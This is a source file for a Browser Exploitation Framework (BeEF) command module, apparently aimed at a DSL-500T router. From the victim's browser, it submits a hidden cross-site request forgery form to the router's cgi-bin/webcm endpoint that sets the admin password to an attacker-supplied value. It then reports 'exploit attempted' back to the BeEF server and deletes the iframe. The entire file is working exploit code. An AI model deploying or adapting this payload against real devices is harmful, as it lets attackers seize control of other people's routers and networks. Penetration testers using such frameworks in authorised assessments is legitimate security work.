1
//
2
// Copyright (c) 2006-2025Wade Alcorn - [email protected]
3
// Browser Exploitation Framework (BeEF) - https://beefproject.com
4
// See the file 'doc/COPYING' for copying permission
5
//
6

7
beef.execute(function() {
8
  var gateway = '<%= @base %>'; 
9
  var passwd  = '<%= @password %>';
10
  var timeout = 15;
11

12
  var dsl500t_iframe_<%= @command_id %> = beef.dom.createIframeXsrfForm(gateway + "cgi-bin/webcm", "POST", "application/x-www-form-urlencoded",
13
      [{'type':'hidden', 'name':'getpage', 'value':'../html/tools/usrmgmt.htm'} ,
14
       {'type':'hidden', 'name':'security:settings/username', 'value':'admin'},
15
       {'type':'hidden', 'name':'security:settings/password', 'value':passwd},
16
       {'type':'hidden', 'name':'security:settings/password_confirm', 'value':passwd},
17
       {'type':'hidden', 'name':'security:settings/idle_timeout', 'value':'30'}
18
      ]);
19

20
  beef.net.send("<%= @command_url %>", <%= @command_id %>, "result=exploit attempted");
21

22
  cleanup = function() {
23
    document.body.removeChild(dsl500t_iframe_<%= @command_id %>);
24
  }
25
  setTimeout("cleanup()", timeout*1000);
26

27
});
28

29

30